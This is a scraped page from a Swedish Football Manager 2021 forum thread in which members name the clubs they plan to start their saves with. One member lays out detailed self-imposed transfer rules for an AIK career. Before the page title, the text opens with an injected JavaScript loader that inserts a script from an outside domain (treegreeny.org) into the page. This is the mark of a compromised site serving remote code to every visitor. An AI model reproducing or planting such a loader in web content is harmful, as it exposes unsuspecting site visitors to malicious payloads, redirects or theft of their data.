;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilken klubb ska du börja med och varför? – Sida 2 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Vilken klubb ska du...
 
Share:
Notifications
Clear all

Vilken klubb ska du börja med och varför?

78 Inlägg
53 Users
163 Reactions
7,147 Visningar
Fabian Andersson
(@fandersson)
Bloggare
Blev medlem: 4 år sedan
Inlägg: 8
 

Hamnar antagligen någonstans på den engelska landsbygden och försöker undvika att få sparken. Även lokala lagen Norrby, Elfsborg och Dalstorp ligger bra (eller dåligt) till för att få Fabian som ny tränare.


   
Micke and vicke231 reacted
SvaraCitera
vicke231
(@vicke231)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 35
 

Är lite inne på Italien, faktiskt. Genoa lockar. Alternativt Perugia eller Brescia. 


   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

@vicke231 Är inne på samma bana faktiskt, lutar lite åt Lecce nu när Zuta och Björkengren gått dit. Chansen att gå upp en serie lockar alltid dessutom.

"I have never played for a draw in my life." - Sir Alex Ferguson


   
vicke231 reacted
SvaraCitera
(@nillie)
Active Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Blir VSK för mig. Känns som laget och staden länge haft potential att etablera sig i Allsvenskan, så det blir mitt uppdrag att se till att det sker! Plus Prodell hehe. 


   
Micke reacted
SvaraCitera
 3rik
(@3rik)
Active Member
Blev medlem: 4 år sedan
Inlägg: 18
 

Brukar alltid bli Ajax på betan för att testa de nya funktionera främst. Sedan blir det nog något östeuropeiskt lag eller en journeyman i östeuropa. Var i Tjeckien på FM20 så blir kanske Serbien/Kroatien som start denna gången. 

Var i Lissabon i höstas och blev inspirerad av att antingen ta ett mindre lag och utmana de stora klubbarna eller ta något litet som ligger precis bredvid, Estoril eller liknande. Underbar stad och fina fotbollslag där.


   
vicke231 and Micke reacted
SvaraCitera
wennstrom
(@wennstrom)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
 

Just nu lutar det åt Torino. Älskar Belotti samtidigt som klubben sitter inne på en väldigt fin historia. 


   
zXc and Micke reacted
SvaraCitera
 Adde
(@adde)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 

Efter gårdagens match mot Arsenal så tycker jag att Aston Villa blir mer och mer intressanta. Fint lag där flera av de tongivande spelarna är britter. Förhoppningsvis så är ser Watkins bättre ut nu när han gått starkt även i PL. Så de lutar åt Aston Villa. 


   
Daniel Nilsson and Micke reacted
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Efter helgens och senaste tidens matcher börjar jag titta alltmer åt Aston Villa och Southampton.

Just nu är jag uppe i:
- Everton
- Malmö FF
- Bournemouth
- Aston Villa
- Southampton

Kommer säkert få känn för typ Ajax, Celtic och Fiorentina snart också för att inte nämna något franskt mittenlag.

 

Nu börjar det kännas (personligen) att FM21 närmar sig!!!


   
Micke reacted
SvaraCitera
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin
Blev medlem: 4 år sedan
Inlägg: 32
 

Det absolut viktigaste när man väljer lag är givetvis färgerna. Röd går i 99 fall av 100 bort direkt

PW


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  
Postad av: @pontus-wernbloom

Det absolut viktigaste när man väljer lag är givetvis färgerna. Röd går i 99 fall av 100 bort direkt

Pontus Wernbloom – Wikipedia

 


   
jp103, Argt Troll, zXc and 6 people reacted
SvaraCitera
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin
Blev medlem: 4 år sedan
Inlägg: 32
 

@daniel-nilsson

Haha touche

PW


   
Micke and Daniel Nilsson reacted
SvaraCitera
 Soap
(@soap)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
 

Efter att ha spenderat lång tid (45 år för att vara exakt) i Grekland på FM20 så blir saven på FM21 INTE i Grekland, förvånande nog. Haft långa saves på tidigare FM i bland annat Rumänien, Portugal x3, Spanien x2, Frankrike, Holland bl a.

Har funderat lite på Turkiet, aldrig provat en save där och finns lite spännande lag att prova där, frågan är bara vilket. Hittar man inget i Turkiet får man väl hitta något annat.


   
Micke and vicke231 reacted
SvaraCitera
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
 

För mig blir det antingen i Holland eller Belgien. Funderar på Vitesse, AZ eller Twente i Holland och allt utom Standard i Belgien som jag av någon anledning verkligen inte tycker om. Men det blir en kort save för att lära känna spelet och framförallt det taktiska.

Så fort den fulla versionen släpps blir det med all säkerhet Sydamerika alternativt Mexiko för en långkörare! 


   
SvaraCitera
(@aikarmetal)
New Member
Blev medlem: 4 år sedan
Inlägg: 4
 

Jag lirar alltid en långsave med AIK, det brukar dock gå väldigt snabbt innan man utmanar om CL titeln då jag dammsuger världen på talanger. I min nuvarande save på FM19 är jag på år 2036 och har nog närmare 40 lirare på utlåning med ett enda syfte, att tjäna pengar. A-truppen innehåller väl ca 25 spelare där alla värvats in som 16-18 åringar. I FM21 tänkte jag ha en helt annan strategi. På någon FM upplaga så tog en forummedlem över de 5 största lagen i allsvenskan och hade en speciell värvningsstrategi baserat på tabellplaceringarna för lagen. Typ att vinnaren skulle alltid köpa superettans skyttekung och sedan slumpades ett land fram varifrån man fick köpa spelare. Jag kom och tänka på den tråden för någon vecka sedan och tänker skapa en liknande strategi för min långkörare med AIK. Förhoppningsvis blir utmaningen större, samt så blir det lite mer realistiskt och roligare.

 

Regler som alltid gäller:

Jag får ha max 25 spelare i A-truppen. I reservlaget + juniorlaget får det finnas max 20 spelare. Jag får bara värva svenska spelare till juniorlaget. I A-truppen måste minst 12 spelare vara från Sverige (dvs ha svenska som modersmål).

Till A-truppen och reservtruppen får jag bara värva spelare som ska utmana om platser i A-laget. Dvs jag får inte värva spelare i enbart försäljningssyfte.

Jag får bara värva spelare från ligor och klubbar som är lägre rankade än Allsvenskan och AIK.

Jag får värva spelare från lägre divisioner i Sverige, dvs superettan och nedåt.

Jag får värva kontraktslösa svenska spelare. 

Jag får värva kontraktslösa utländska spelare som spelat i klubben tidigare.

Jag får värva spelare med AIK som moderklubb.

 

Regler baserat på prestation:

Om jag vinner allsvenskan får jag:

   1) Värva 1 spelare från en nordisk klubb.

   2) Värva max 3 spelare från ett slumpmässigt valt europeiskt land. 

   3) Värva 1 spelare från ett framslumpat afrikanskt land. Om landet saknar spelare blir det ingen spelare det året, men nästa gång jag vinner allsvenskan får jag värva en till spelare från ett nytt framslumpat afrikanskt land.

Om jag inte vinner allsvenskan får jag:

   1) Värva en spelare från en allsvensk klubb.

   2) Värva en spelare från ett slumpmässigt valt europeiskt land.

Om jag lyckas kvala in till gruppspelet i antingen CL, EL eller ECL får jag:

   1) Värva en spelare från ett slumpmässigt valt sydamerikanskt land (Här får ligan vara högre rankad än Allsvenskan, men klubben får inte vara högre rankat är AIK).

   2) Värva en utländsk kontraktslös spelare.

   3) En wildcard spelare, dvs en spelare utan restriktioner (utöver liga- och klubbrankningsrestriktioner som ska följas)

Om jag vinner svenska cupen får jag värva en spelare från Asien eller Oceanien.

 

Generellt kommer plånboken hållas tight, men så brukar jag spela. Jag kommer att försöka hålla mig till de priser som gäller generellt i Allsvenskan. Jag tror nog att Norrköping har rekordet i inköpspris på Sead Haksabanovic som köptes för ca 26 miljoner kronor. Jag får inte slå det priset.

 

Det här kan nog bli en jäkligt rolig save 🙂

 


   
vicke231 and Micke reacted
SvaraCitera
Challa
(@challa)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 128
 

Inleder i sedvanlig ordning med Juventus. Brukar hålla ett par säsonger. Efter det blir det något lag längre ned i divisionerna, alternativt Allsvenskan. 

Mitt liv är en multimediafil


   
SvaraCitera
(@brunosantos)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 
Postad av: @brunosantos

Känslan är att Sampdoria blir första stoppet. Italienska ligan känns mer spännande än på länge och laget med världens vackraste tröja blir då en lagom start. 🙂

Valet föll visserligen på den italienska ligan men Bologna istället för Sampdoria. Fina tröjor (viktigt!) och för mig lite oväntat många intressanta talanger (Svanberg, Barrow, Tomiyasu, Vignato, Skov-Olsen mfl) samt evigt unga synth- tofsen Rodrigo Palacio på topp! 🙂


   
vicke231 reacted
SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 102
 

När jag kollade runt igår kväll så blev jag för första gången på flera år sugen på att starta med AIK Save. Kommer satsa på de ungdomar som finns i laget som Kahl,Ben Lamin, Tihi, Strannegård, Erik Ring, Abraham och Radulovic. Sälja dökött som Lindkvist , Adu, Lundström, Rashidi sedan båda målvakterna alternativ en och köp en målvakt för att satsa på Samuel Brolin efter Utlåning. Värva free Transfers så gott man kan pga ekonomiska förutsättningarna


   
raca14 and Micke reacted
SvaraCitera
(@eryksson)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
 

Blir en sväng till Rotterdam och Feyenoord nu i början. Aldrig kört holländska ligan tidigare samt att efter WWWK podens avsnitt om dom blev man otroligt sugen på att ge det en chans. 

 


   
SvaraCitera
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
 

Peking, som alltid. Målet med första säsongen blir att göra bättre ifrån sig än laget gjort IRL under 2020 - lär inte bli särskilt svårt...


   
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@hypno

Hahaha... Nä, det lär inte bli så svårt, men om säsongen enbart varit 10 matcher lång, så hade det varit desto svårare... 🙂


   
SvaraCitera
Sida 2 / 4
Share: